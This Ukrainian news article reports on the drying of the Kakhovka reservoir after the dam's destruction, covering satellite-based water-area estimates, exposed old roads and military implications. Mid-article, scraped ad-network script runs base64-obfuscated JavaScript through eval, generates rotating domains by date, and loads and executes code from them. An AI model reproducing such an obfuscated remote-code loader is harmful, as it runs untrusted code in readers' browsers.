Де залишилися водойми та русло Дніпра на місці Каховського водосховища: супутникові знімки (ФОТО)

Каховське водосховище внаслідок російського теракту на ГЕС перетворюється на річку. В Інтернеті опублікували супутникові знімки та карту, на який відображено поточну екологічну ситуацію, з’явилася оцінка науковців та експерта.

Наразі продовжується стрімке обміління, внаслідок чого поступово утворюється русло ріки Дніпро, а на місцях води виявлено дороги, що може стратегічно вплинути на обстановку. Про оцінки наслідків підриву Каховської ГЕС для екології та бойових дій — детально в матеріалі Акцента.

Обміління Каховського «моря»: оцінка рівню води та наслідків підриву ГЕС від НАН

У середу, 21 червня, Національна академія наук України (НАН) опублікувала повідомлення стосовно екологічної ситуації, пов’язаної з підривом росіянами Каховської ГЕС. Згідно з інформацією, науковці Українського гідрометеорологічного інституту обробили спектрозональні знімки території Каховського водосховища, які були надані Європейським космічним агентством (супутник Sentinel-2А), які, як зазначається, крім високої роздільної здатності «дозволяють виокремити площі, залиті водою, від суходолу, з високим ступенем точності».

На світлині нище видно дрібні водойми, які швидко пересохнуть через відсутність сполучення з іншими водоймами та руслом ріки Дніпро:

«По цьому знімку можна побачити численні дуже дрібні водойми, площею близько 0,1 км2. Їх не варто враховувати під час обчислення площі залишків водосховища, оскільки вони ніяк не сполучені з іншими водоймами і руслом р. Дніпро та його відгалудженнями, тому швидко пересохнуть».

Спектрозональний знімок із супутника Sentinel-2A з виділеним каналом води (HDWI). Джерело: сайт НАН України.

Водночас зазначається, що є і більш великі водойми, які сполучені з основним руслом або з’єднані з ним протоками: це вказує на більш глибокі ділянки водосховища. На зображенні нижче показана північно-західна ділянка Каховського водосховища з нанесеними ізобатами: виходячи з отриманих даних, Каховське водосховище осушене на глибину 10 метрів, зазначають в НАН.

Що стосується залишкових водойм, вони є досить мілкими, «тому запас води в них невеликий і вони можуть швидко пересохнути». Ізобата на малюнку з глибиною 15 м — втім, вона проходить «біля лівого берега водосховища і відповідає руслу Дніпра».

Довідка: Ізобата — ізолінія на топографічному плані або карті, що з’єднує точки однакової глибини водойм. Згідно зі статтею вільної енциклопедії Вікіпедія, часто області між сусідніми ізобатами пофарбовані в ті чи інші відтінки блакитного кольору. Більш світлими відтінками області з меншими глибинами, більш темними — області з більшими глибинами.

Північно-західна ділянка залишків Каховського водосховища. Джерело: НАН України

Також, на фото нижче значна частина площі водосховища має світло-коричневий колір, який характерний для сухої поверхні. Як вказують в НАН, значна частина водосховища вже не тільки позбавлена води, але й фізично висохла.

Знімок із супутника Sentinel-2A в оптичному діапазоні. Джерело: НАН

«Якщо оцифрувати лише відносно великі водойми, а також ті з них, які мають сполучення з руслом річки, можна порахувати їх площу. Для наочності вона наведена на всіх рисунках. Відповідно, сумарна площа водної поверхні Каховського водосховища станом на 20 червня становить 509,23 км2. Це менше, ніж аналогічні дані 3-денної давності – 17 червня ця площа становила 655 км2. Таким чином, за три дні площа водосховища скоротилася ще на 22%. Відповідно, тепер вкрито водою лише 24% його площі від початкового рівня станом на 5 червня.

Причому, станом на 20 червня на русло р. Дніпро припадає 129 км2 площі водосховища», — зазначають в Національній академії наук. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Відновлення русла Дніпра на місці водосховища: висновки науковців

Згідно з висновками Українського гідрометеорологічного інституту ДСНС України та НАН України, в цей час спостерігається «формування, а точніше, відновлення русла р. Дніпро»:

«Таким чином, більша частина водосховища у засушливий період року пересихатиме, в вологий – наповнюватиметься водою. Це число – 6% площі водосховища, яка зайнята руслом – певним чином вказує на залишкові його характеристики. У кінцевому підсумку саме руслові процеси – формування чіткого русла, відділення від нього і висихання залишкових водойм – визначатимуть деградацію водосховища. І по суті, залишається не «площа водосховища», а площа русла».

Стадії осушення Каховського водосховища. Джерело: НАН України.

Так, на карті вище чітко видно водойми відносно невеликого обсягу, які сформувалися внаслідок російського підриву ГЕС на ділянках Каховського водосховища: вони наявні в районах тимчасово окупованих населених пунктів Запорізької області (станом на 20 червня) — Василівка, Скельки, Балки, але вода відійшла від берегів на певну відстань. Втім, як показано на мапі, фактично повністю осушеними (станом на 9, а також — 13 та 16 червня) є ділянки водосховища в районах н.п. Іванівка, Водяне, в районі Кам’янки-Дніпровської тощо.

Також, ВВС візуалізувала ситуацію з обміленням Каховського водосховища на основі супутникових знімків компанії Planet labs. Спочатку на відео нижче демонструється обстановка у період за 5-20 червня у зоні зруйнованої греблі та місця, де черпав воду Північно-Кримський канал, а потім — за 5-18 червня у районі Нікополя.

Виявлення старих доріг на ділянках Каховського водосховища

Внаслідок стрімкого обміління Каховського водосховища, спричиненого російським підривом Каховської ГЕС, на місці води виявлені старі дороги. Twitter-акаунт BrennpunktUA опублікував карту, на якій видно стару дорогу під колишнім Каховським водосховищем, яке веде з Нікополя до тимчасово окупованої Великої Знам’янки: як зазначається в пості, «мул зараз швидко просихає через погоду».

Джерело: BrennpunktUA.

Також, як передає УНІАН, у коментарі BILD військовий оглядач Юліан Ріпке припустив, що пересохле Каховське водосховище може бути плацдармом для українського наступу. Зокрема, експерт вказав на розширення українського фронту через російський підрив ГЕС на 200 км.

«Пересихання Каховського водосховища призвело до різкої зміни стратегічної ситуації на півдні України. Як для російської окупаційної армії, так і для українських захисників з’явилися нові можливості, але також і нові небезпеки«, — пояснив Рьопке.

Ширина водосховища становить від 7 до 30 км: за його оцінкою, солдати вже зараз можуть пройти по висохлому дну. Що стосується техніки, то на думку журналіста, колісна навряд чи проїде в тому районі, втім, пересування гусеничної — можливе. Водночас, як зазначив оглядач, у наступ через водосховище можуть перейти і російські окупаційні війська у випадку, якщо намагатимуться знову спробувати окупувати правобережну частину Херсонської області.

До слова, як інформував Акцент раніше, стало відомо про нові контратаки росіян між Пологами та Оріховом.
(adsbygoogle = window.adsbygoogle || []).push({});

Росіяни вдаються до контратак на Запорізькому напрямку: що відомо (КАРТИ), — оглядач Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/de-zalishilisya-vodojmi-ta-ruslo-dnipra-na-mistsi-kahovskogo-vodoshovishha-suputnikovi-znimki-foto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top